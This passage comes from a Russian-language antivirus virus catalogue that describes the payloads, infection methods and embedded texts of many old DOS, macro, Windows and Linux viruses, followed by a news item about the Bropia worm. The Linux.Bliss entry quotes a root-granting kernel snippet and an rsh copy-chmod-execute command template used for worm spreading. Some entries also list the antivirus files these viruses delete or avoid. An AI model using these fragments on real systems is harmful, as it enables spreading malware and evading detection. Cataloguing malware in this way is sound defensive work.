VICE - вирусы

VICE (Virogen's Irregular Code Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Существуют несколько версий генератора. Они содержат текстовые строки:
[VICE v0.1с, by ыirogen]
{VICE v0.2с, by ыirogen [NuKE]}
{ViCE v0.3с, by ыirogen [NuKE]}
[ыiCE v0.5, by ыirogen]

VICE.Code

Очень опасный резидентный полиморфный вирус. Удаляет файлы, упакованные архиваторами ARJ и ZIP, а также файлы, начинающиеся на -V, MS, CP. Не заражает файлы, имена которых оканчиваются на ND, AN, AV, OF, NU. Содержит текст "CodeJournal by ыirogen [NuKE]".

VICE.One13th

Опасный резидентный полиморфный вирус. Уничтожает файлы ANTI-VIR.DAT, CHKLIST.MS, CHKLIST.CPS, а также некоторые файлы антивирусной системы InVircible. Имеет строку "One/Thirteenth, coded by ыirogen [NuKE]".

Victim.600

В четверг прибавляет к значению системного времени 100 лет. Содержит текст "Victim of Galeocerdo cuvieri".

Vienna.based - вирусы

Данные вирусы написаны на базе исходных текстов первого знаменитого вируса Vienna.648.

Vienna.776

Иногда выводит текст:
Я, кажется, подхватила какую-то заразу...
Срочно звоните Дмитрию Николаевичу Лозинскому
по телефону 292-40-76 (Москва) и приобретите
ПРОГРАММУ AIDSTEST !!!

Vienna.1239

Пытается уничтожить 3 первых сектора цилиндра 0 головки 1 первого жесткого диска.

Viking.59

В настоящее время данный вирус является мировым рекордсменом среди самых маленьких резидентных файловых вирусов, сохраняющих работоспособность инфицированных программ. Является усовершенствованной модификацией вирусов Dinky, но с использованием пары неплохих приемов.

Viking.Mixtura

Неопасный резидентный вирус. Не заражает файлы, начинающиеся на -V, AI, AD, M. Содержит текст "Crypted Here->", после которого, видимо, идет зашифрованный текст, а также:
ViKing-Mixtura,CopyLeft (L) 1993 by ViKing.
ViKing is The Real King of Viruses' Kingdom.

Vinchuca.925

Очень опасный резидентный шифрованный вирус. 3 июля пытается уничтожить содержимое 17 секторов 4 головок на всех дорожках жесткого диска. 3 числа любого месяца выводит на экран текст:
ЙНННННННННННННННННННННННННННННННННННННННН»
є Virus ViNCHuCa V1.0 1993. є
є Creado por MURDOCK. є
є Buenos Aires ,Argentina. є
є є
є Su PC tiene Mal de Chagas....jajaja... є
ИННННННННННННННННННННННННННННННННННННННННј
Содержит также строку "Saludos para SaTaNiC BRaiN y Patoruzu".

Vinnitsa.1046

Опасный нерезидентный вирус. Разрушает DBF-файлы, записывая в них первым байтом - байт 6.

Vinnitsa.1207

Очень опасный резидентный вирус. Иногда записывает информацию из видеобуфера в случайные сектора диска методом длинной записи (f.0Bh INT 13h). После такой записи данные сектора обычным способом (f.02 INT 13h) прочитать не удастся. Вирус перехватывает INT 10h, 16h, 21h. Вирус замедляет вывод на экран через INT 10h. Устраивает некоторые "шутки" с клавиатурой. Содержит текст "Vinnitsa ©1994 by Eddie Murphy".

Vinnitsa.1620, 1658

Очень опасные резидентные зашифрованные вирусы. Иногда уничтожают информацию в случайных секторах диска, разрушают DBF-файлы, записывают случайные числа в случайные порты. Содержат текст "Vinnitsa 1992 year Hacker all country, united!!!".

VirCheck.2161, 2170

Неопасные резидентные шифрованные вирусы.В четверг 12-го выводят текст:
ХНННННННННННН VirCheck V1.2 ©1991 НННННННННННё
і Be aware of those worms out there, violating і
і your machine on Friday 13th - it's tomorrow! і
і і
і Special thanks to Ross M. Greenberg, і
і Patricia M. Hoffmann and John McAfee і
ФНННННННН Press any key to continue... ННННННННѕ

Virogen.ASeXual

Опасный полиморфный вирус. Заражает COM-файлы стандартным способом, записывая свой код в конец файла, а EXE-файлы заражает, как вирус-спутник, создавая файл с расширением COM, но с таким же именем, как и у EXE-файла. Удаляет файлы CHKLIST.* ANTI-VIR.*. 2 числа каждого месяца выводит на экран текст:
ASeXual Virus V0.99 - Your computer has been artificially Phucked!
Содержит текст "©1993 - Virogen".

Virogen.BombTrack

Опасный резидентный полиморфный вирус. Удаляет файлы CHKLIST.MS и CHKLIST.CPS. Может удалить все файлы в текущем директории и создать директории NEVERэne. и BOMBTRA.CK. Содержит строку "BOMBTRACK v1.00 - Coded by NEVERэne (BELGiUM)".

Virogen.Offspring.1130

Неопасный полиморфный вирус. Для EXE-файлов - вирус-спутник. 9 числа выводит текст "OFFSPRING V0.81", после чего начинает издавать звуковой сигнал и мигать лампочками на клавиатуре. Содержит также еще одну строку "©1993 negoriV".

Virogen.Offspring.1294

Полиморфный неопасный вирус. 14 числа выводит на экран текст:
©1993 negoriV
* Thank you for providing me and my offspring with a safe place to live *
* Offspring I v0.07. *

Virogen.Offspring.1555

Опасный резидентный полиморфный вирус. Для EXE-файлов - вирус-спутник. Удаляет файлы CHKLIST.*, ANTI-VIR.DAT. По 9 числам месяца выводит текст "OЯЯspring Virus V0.89". Содержит текст "GA© ыirogen".

Virogen.PinWorm

Опасный резидентный полиморфный вирус. Удаляет файлы CHKLIST.CPS и CHKLIST.MS. 1 числа любого месяца создает директории PIяWщrM.ыg!, а в нем создает 13 файлов:
I hope y
ou have
enjoyed
your inf
estation
by the
mighty P
inworm p
arasiteъ
ъъъъъъъъ
Fuck you
all!
-ыirogen
Содержит строку "PIяWщrMяv1.00 - Coded by ыirogen in April 1994".

Viros.429

Неопасный резидентный вирус. Размещает свою резидентную копию по адресу 6800:0000. Выводит сообщение:
ЪДДДДДДДДДДДДДї
і VIROs v1.1 і
АДДДДДДДДДДДДДЩ

Virus90.857, Virus101.2560

Нерезидентные вирусы. Virus101.2560 - шифрованный, опасный вирус. Выводят на экран сообщения:
Virus90.857 - Infected!
Virus101.2560 - This file has been safely infected by
VIRUS101 - the safe, educational virus utility.
This copy furnished to John McAfee.
Virus90.857 периодически сдвигает символы на экране и "перегружает" систему. Virus101.2560 в загрузочных секторах дисков производит замену текстовой строки "Non system disk or disk error!" на вышеприведенный текст.

VirusConstructor.based - вирусы

Данные вирусы сконструированы с помощью вирусных конструкторов IVP, PS-MPC, G2 или VCL. Вирусные конструкторы - это программы, способные создавать исходные тексты, объектные и исполняемые вирусные модули. Существует возможность задания различных вариантов и типов вирусов в файлах конфигурации конструкторов или непосредственно из меню программы (VCL). Вирусные конструкторы позволяют создавать резидентные или нерезидентные вирусы, заражающие COM, EXE, или COM/EXE-файлы, шифрованные или нешифрованные, замещающие программный код (overwriting) или вирусы-спутники (companion). А также позволяют задавать наличие в вирусах всевозможных текстовых строк, видеоэффектов и деструктивных функций.

Viv.513, Viv.524<.i>, Viv.771

Содержат в своем теле слово "VIV". Viv.771 после 4097 вызовов INT 21h затирает таблицу прерываний нулями.

Vlad.Antipode

Неопасный резидентный шифрованный вирус. Содержит текстовую строку "TBSCAN.EXE[Antipode 1.0] by Automag/VLAD".

Vlad.Daddy

Опасный резидентный вирус. Удаляет файлы ANTI-VIR.DAT, MSAV.CHK, CHKLIST.CPS, CHKLIST.MS. Содержит текст "[Incest Daddy] by Qark/VLAD".

Vlad.Hemlock

Неопасный резидентный файлово-загрузочный полиморфный стелс-вирус. Заражает MBR жесткого диска, Boot-сектора флоппи-дисков, COM, EXE и SYS-файлы. Перехватывает INT 09, 13h, 21h. "Переживает" перезагрузку системы при нажатии на Ctrl-Alt-Del. При старте программы TBSCAN вирус подставляет в командную строку программы ' co nm'0Dh. При старте программы WIN в командную строку подставляются значения ' /d:f',0Dh (16-битовый доступ к диску). При старте программ CHKDSK, PKZIP, ARJ, NDD, SCANDISK, LHA вирус "выключает" свой стелс-режим. При загрузке с инфицированного MBR вирус перехватывает INT 09, 13h, копирует таблицу векторов прерываний в свой буфер, и затем пытается определить в памяти наличие драйвера DOSDATA.SYS из комплекта QEMM. Если данный драйвер будет найден, то вирус пытается определить запуск файла AUTOEXEC.BAT или любой EXE-программы, после чего перехватывает INT 21h. Если же драйвер DOSDATA.SYS не найден вирусом, то перехват INT 21h осуществляется после чтения 10 заголовков EXE-файлов через INT 13h. При нажатии на Ctrl-Alt-Del вирус определяет тип процессора, а также для процессоров 286+ нахождение их в защищенном режиме. Если процессор 286+ работает в защищенном режиме, то перезагрузка системы игнорируется. В противном случае, а также для процессоров ниже 286 - в область таблицы векторов прерываний копируется старая таблица из буфера вируса, после чего производится вызов INT 19h. Вирус содержит текст "Hemlock by [qark/VLAD]".

Vlad.Mummy

Неопасный резидентный шифрованный вирус-спутник. Содержит текст "[Mummy Incest] by VLAD of Brisbane. Breed baby breed!".

Vlad.Lapis

Неопасный резидентный вирус. Внедряет 445 байт своего кода в область стартовых байт EXE-программы, перенеся их в конец файла. Содержит текст "[Lapis-Lazuli], Rhince/VLAD".

Vlad.Sister

Неопасный резидентный шифрованный вирус. Содержит текст "[Incest Sister] by VLAD - Brisbane, OZ".

Vodka.551, 560

Неопасные (Vodka.551 - опасен) резидентные вирусы. В мае Vodka.551 записывает в начало запускаемых COM-файлов код, который выводит текст:
COM_ДИБИ центр г.ХАРЬКОВ
тел 03
Vodka.560 может вывести на экран текст "Пиво,Водку пить - здоровью вредить!? (Y/N)" и ожидать нажатия на клавиши "Y" или "N". Содержит текст "(copyleft) ДИБИЛИЗАТОР ver. 1.2".

Voronezh.650

Иногда выводит на экран сообщение "Video mode 80x25 not supported". Имеет также строку "16.01.91, v1.00, Химик & Слон".

Voronezh.1536 (1-3)

Опасные резидентные вирусы. При печати на принтере иногда изменяют некоторые слова на нецензурные.

Vpk.1430

Опасный резидентный вирус. "Перехватывает" INT 10h, 21h, 4Ah. Устанавливает 2 резидентные копии: одну в область видеопамяти по адресу B800:0FA0h "на" INT 10h и 21h,другую - в верхние адреса памяти "на" INT 4Ah. Периодически копирует код из второй копии в видеопамять. Иногда при выводе на экран заменяет русские буквы на латинские. Может записать в MBR первого жесткого диска троянский код, который после нескольких перезагрузок "завешивает" систему. Может вывести текст "<< Russian killer! >>". Также содержит текст "Привет Лозинскому от ВПК !".

VS.2790

Неопасный резидентный стелс-вирус. Если в течение 6 минут не было нажатий на клавиши, вирус исполняет гимн СССР. Содержит текст:
VS-061-"STEALTHIE". © 1993, ViruSystems inc.
VS

VS.3900, 4000

Неопасные резидентные полиморфные стелс-вирусы. При отсутствии ввода с клавиатуры в течение 15 минут выводят одну из 4 мелодий. Содержат тексты:
VS.3900 -
VS-071-"GHOST". © 1993, ViruSystems inc.
High performance music mutant virus, enhanced version 7.1.
Shareware.
***MAKERS OF VIRUSES OF THE WORLD, UNITE !!!***VS
VS.4000 -
VS-072-"GHOST". © 1993, ViruSystems inc.
High performance mutant virus, enhanced version 7.2.
Special thanks to E.Kaspersky!
*** MAKERS OF VIRUSES OF THE WORLD, UNITE!!! ***VS

X

X-Mrei.866, 1405

Неопасные резидентные шифрованные (X-Mrei.1405 - полиморфный) вирусы. Не заражают файлы, содержащие в своем имени буквосочетания AIWEANIN. Выводят на экран строку "X-Mrei 7".

XAM.278

Заражает EXE-файлы весьма оригинальным способом. Вирус внедряет свой код в область таблицы перемещаемых символов (relocation table), изменив три байта сигнатуры EXE-файла 'MZ' на JMP NEAR. Но самое интересное то, что вирус использует для заражения INT 16h. Перехватывая данное прерывание вирус контролирует дисковые буферы DOS, просматривает всю цепочку дисковых буферов и если обнаруживает в каком-нибудь из них признаки заголовка EXE-файла, то внедряет свой код в заголовок EXE, находящийся в этом буфере и устанавливает признак "загрязненности" буфера. Т.е., если данный буфер используется для записи, DOS запишет заголовок EXE-файла вместе с вирусом на диск.

Xtac.1564

Опасный резидентный вирус. После 24 числа каждого месяца удаляет файлы, расширение которых отличается от расширений, указанных в следующей текстовой строке "COMEXESYSBATOBJOVROVLINICFGTPUHLPTPLBGICHR". Содержит текст "good news! you have justbeen smitten by XTAC - lyndon siao, usc-tc"

Xyz.1561

Неопасный резидентный, пытающийся быть невидимым, вирус. В пятницу может вывести слово из 3 букв, коее очень умные люди привыкли писать на заборах.

Новенькое

Checkbox.936
Опасный резидентный вирус. Первым делом пытается заразить файл C:\DOS\SMARTDRV.EXE. При появлении на экране строк "checkboxports", "givegodmode", "iamtheboss" вирус предпринимает некоторые действия по переводу консоли на COM-порт, через который, возможно, соединение взломщика с инфицированным компьютером.
Dotter.3961
Неопасный резидентный шифрованный вирус. Иногда может вывести на экран одно из приведенных ниже высказываний:

"Не богатей дуpными сpедствами" (Фалес).
"Чем поддежал ты своих родителей, такого жди и от детей" (Фалес).
"Заводи друзей не спеша, а заведши, не бросай" (Солон).
"Не злословь о ближнем, чтобы не услышать такого, чему сам не порадуешься" (Хилон из Спарты).
"Что лучше всего? Хорошо делать, что делаешь" (Питтак)
"Только больная душа может быть глуха к чужой беде" (Бинат).
"Цивилизация - это совокупность духовных, материальных и нравственных средств, которыми данное сообщество вооружает своего члена в его противостоянии внешнему миру" (М.Барг).
"Если для создания социализма требуется определенный уровень культуры... то почему нам нельзя начать сначала с завоевания революционным путем предпосылок для этого определенного уровня, а потом уже, на основе рабоче-крестьянской власти и советского строя, двинуться догонять другие народы" (В.Ленин).
"Пришло несчастье - человек сам его породил, пришло счастье - человек сам его вырастил. У несчастья и счастья одни двери, польза и вред - соседи" (Конфуций).
"Мир - это священный сосуд, которым незьзя манипулировать. Если кто хочет манипулировать им, уничтожит его" (Дао) .
Запад есть Запад, Восток есть Восток,
не встретиться им никогда.
Лишь у подножья Престола Божья
в день Страшного Суда. (Р.Киплинг)
"Кто покупает ненужное, тот скоро продаст необходимое" (Б.Франклин).
"Помните, что время - это деньги" (Б.Франклин).
"Следуй pеке, начиная с ее истоков. Истина сегодня-завтpа окажется ложью" (Ф.Паулюс).
"За ошибки госудаpственных деятелей pасплачивается вся нация" (Н.Беpдяев).
Весь мир - театр.
А в нем женщины, мужчины - все актеры.
У них есть выходы, уходы.
И каждый не одну играет роль.
Семь действий в пьессе той.
Младенец, школьник,юноша, любовник,
Солдат, судья, старик. (Шекспир)
- "Человеческое достоинство нерушимо.Уважать и защищать его - обязанность всякой государственной власти" (Конституция ФРГ, ст. # 1)
- "Государственная власть основывается на непоколебимим доверии народа, ее авторитет исходит от народа, ее полномочия осуществляются посредством народа, а благами ее пользуется народ" (из Конституции Японии)
- "Вся власть в СССР принадлежит народу" (Конституция СССР 1977 г., ст. 2)
"Неча на зеркало пенять, коль рожа крива" (про тебя)
Без пищи человек живет пять недель, без воды - пять дней, без воздуха - пять минут
                                                               
C2H5OH = ИСТОЧНИК ВЕЧНОГО ВДОХНОВЕНИЯ

     ExcelMacro.Legend
Неопасный макро-стелс-вирус. Удаляет пункт меню "Tools|Macro". Если UserName="Pyro" и OrganizationName="VBB", то вирус прекращает работу и файлы не заражает. Может вывести сообщение:

Pyro [VBB]
You've Been Infected By Legend!
ExcelMacro.Robocop
Опасный макро-вирус. Первого марта вирус помещает в текущую таблицу текст "ROBOCOP Nightmare Joker [SLAM]".
ExcelMacro.Yohimbe
Опасный макро-вирус. Записывает строку "Yohimbe" в заголовок заражаемой таблицы. В 16:45 вставляет в текущую таблицу картинку и текст: FUCK YOU BUDDY".
Linux.Bliss.17892, 18064
Неопасные нерезидентные вирусы,"обитающие" в среде Linux (разновидность ОС Unix) и заражающие исполняемые файлы в формате ELF.Написаны на языке GNU C. Внедряются в начало ELF-файлов, сдвигая программный код вниз. В конец инфицированных файлов вирусы записывают тексты:

Linux.Bliss.17892: infected by bliss: 00010002:000045e4
Linux.Bliss.18064: infected by bliss: 00010004:000048ac

В процессе своей "работы" вирусы могут вывести сообщения:

already infected
skipping, infected with same vers or different type
replacing older version
replacing ourselves with newer version
infecting: bytes
infect() returning success
been to already!
traversing
our size is
copy() returning success
copy() returning failure
disinfecting:
not infected
couldn't malloc bytes, skipping
couldn't read() all bytes
read bytes
happy_commit() failed, skipping
couldn't write() all bytes, hope you had backups!
successfully (i hope) disinfected
Debugging is ON
Disinfecting files...
using infection log:

А также содержат в своем теле тексты:

dedicated to rkd
/tmp/.bliss
asmlinkage int sys_umask(int mask)
mask&023000 return if(mask&023000) {current->uid = current->euid = current->suid = current->fsuid = 0; return old&023000} } bliss.%s.%d -l rsh%s%s %s 'cat>%s;chmod 777 %s;%s;rm -f %s' doing popen("%s" /.rhosts r %s %s .rhosts: %s, %s localhost doing do_worm_stuff() /etc /hosts.equiv hosts.equiv: %s HOME --bliss- uninfect-files-please disinfect-files-please
version %d.%d.%d (%.8x)
Compiled on Sep 28 1996 at 22:24:03
Written by electric eel.
dont-run-original
just-run-bliss
dont-run-virus
dont-run-bliss
just-run-original
exec
infect-file unsupported version
help help? hah! read the source!
/proc/loadavg %d.
loadav is %d
bliss was run %d sex ago, rep_wait=%d
/tmp/.bliss-tmp.%d execv /bin
PATH : /usr/spool/news /var/spool/news wow

Malatinec.2396
Неопасный резидентный шифрованный вирус. Не заражает файлы, имена которых начинаются на COMMAND,ADINF,AVG,AVP,CLEAN,DRWEB,F-,FINDVIRU,FV, GUARD,IBMAVSP,IV,NAV,NOD. Удаляет файлы ANTI-VIR.DAT, AVG.GRS, AVP.CRC, CHKLIST.CPS, CHKLIST.MS, CHKLIST.TAV, FINGERP.VVF, FSIZES.QCV, IVB.NTZ, NAV_._NO,SMARTCHK.CPS,_CHK.CHK. Содержит текст:

Virus Malatinec v.0.ыН|Щreated by Aladiah Greet: all my friends in Slovakia; G722,E10,H723,H118 & all H4?? (sch.yr.95/96) & of coz i send a big fuck 2 big boxer V.M. Note: this is last evolutionary (с) version. Don't Worry! Watch out for M.1.0 (available soon:) Msg4Trnka: correct IDstr 4 Malat03=FCBF%2B9...
Mururoa.2464, 3443
Неопасные резидентные шифрованные вирусы. Mururoa.2464 4 числа выводит текст:

I have one mesage to all people on earth :
Stop all French nuclear testing in the PACIFIC
Dont forgot :Comon people dont like nuc. tests!
This is is a MURUROA 1.386 by Blesk
PLUTONIUM IS BETTER IN POWER-PLANT !!!!
My greet to VYVOJAR,SVL,METABOLIS and all IRC.

Mururoa.3443 4, 8 и 14 мая выводит на экран текст:

I have one mesage to all people on earth : All French nuc. test`s was STOPED. But MURUROA
IS DEAD !!!!! I am a coder of HELL FIRE and I
BRING YOU >>>>>> FIRE <<<<<< By Blesk/SVL
NOTE: Name of this virus is [MURUROA_END]
By Blesk from Slovak Virus Laboratories at .SK
Real name of BOZA is BIZATCH.. STUPID A-VERS !!!
PLUTONIUM IS BETTER IN POWER-PLANT !!!!
My greet to: VYVOJAR,SVL,VLAD,SKIMS,40-hex,IR And to some my friends: DJ.Milan,DJ.Maros,
DJ.Babula(Baby),TINA-huhu,DURO,LACI,Duffy,Kaaa,
Stano ...and more... A zdravim Mira Trnku 8))

Не заражают программы, начинающиеся на: avg,fv386,turbo,fv86,guard, toolkit, scan, virlab,vir,asta,vc,sswap,debug,td,stacker,alik,rex,msav, cpav,nod,clean,f-pro,tbav,tbdriver,tbclean,tbscan,avast,nav,vshie,dizz, command, vsafe. Mururoa.3443 содержит тексты: "I am in LOVE now... ZUZANKA B.B. in Slovakia <<8<","For M.T.: Vivat Ziar nad Hronom.. 8)) Uz si rad ?? RADAR v PC Revue 9/94".
Pande.1520
Неопасный резидентный стелс-вирус. По возможности устанавливает свою резидентную копию в область UMB. При запуске программ из списка (по 2 буквы на имя) F-TBARRALHPKCH отключает свои стелс-процедуры. Содержит тексты "pandemonium by retch", "17/04/96".
Tmc.4829
Неопасный резидентный полиморфный вирус. Использует довольно интересный полиморфный механизм. При старте инфицированной программы, вирус получает управление и производит создание в памяти своей новой копии. Вирус хранит в своем теле таблицы по которым по определенным законам строит свой код. При построении этого кода вирус может внедрить в любое место кода (вместо очередной инструкции) команду перехода (E9 ?? ??) в свободное (не занятое еще "рабочими" инструкциями) место и продолжить построение своего кода с этого места.Вирус строит таблицы "уже занятых" областей и "настраиваемых" адресов для корректного создания своего потомка. Также он способен варьировать безусловными переходами (например, замена JE на JNE) в некоторых ситуациях. Затем вирус расшифровывает свой код, который также не является постоянным и устанавливает в память "на INT 21h" свою резидентную копию. Причем обработчик INT 21h также является непостоянным и имеет различные смещения. Далее эта резидентная копия заражает файлы только этим кодом. Для текущего сеанса работы (до следущей установки в память) все копии вируса при заражении файлов будут одинаковы. Вирус содержит текст:

TMC 1.0 by Ender from Slovakia
Welcome to the Tiny Mutation Compiler!
Dis is level 42.
Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel
Personal greetings: K. K., Dark Punisher
Win.Winsurf.1171, 1432
Неопасные резидентные вирусы, заражающие файлы в формате NewExe (NE). При запуске инфицированной программы, вирусы проверяют наличие DPMI и присутствие своих копий в памяти компьютера. Если резидентные копии вирусов не установлены и DPMI-интерфейс существует,то вирусы производят поиск строки "windir=" в своем окружении (environment), открывают файл SYSTEM.INI в каталоге, указанном в переменной "windir=", ищут в данном файле строку "shell=" и производят заражение файла,следующего за данной строкой. Обычно строка "shell=" для MS-Windows 3.xx указывает на файл PROGMAN.EXE (Program Manager). Данная программа является резидентной в течение всего сеанса работы MS-Windows. Т.о., вирус,внедренный в данную программу, также будет являться резидентным. Вирусы с помощью DPMI "перехватывают" INT 21h, "контролируют" запуск программ (Exec f.4bh Int 21h) и заражают NewExe-файлы.
WpcBats.3072
Неопасный резидентный шифрованный вирус. При нажатии на клавишу "F1" вирус выводит на экран текст:
ALA-EH
------ A.R.Jr W P C B A T S -------

Также может вывести надпись "ALA-EH" в графическом режиме монитора.

Новый червь атакует MSN Messenger

Пользователи MSN Messenger снова под прицелом. На этот раз по сети распространяется червь под названием W32/Bropia-A. Вредоносный модуль "сидит" в файлах с расширением PIF. Как только пользователь скачивает этот файл и запускает его, недоброжелатель получает в свои руки рычаги управления удаленным компьютером через Internet Relay Chat. Потенциально Троян может использоваться как кейлоггер, для пересылки спама, для утечки информации. Подобная атака уже была произведена на пользователей MSN Messenger в октябре 2004 и в январе 2005г. Тогда червь под названием Funner, оставлял на зараженном компьютере ссылки на порнографические и игровые сайты.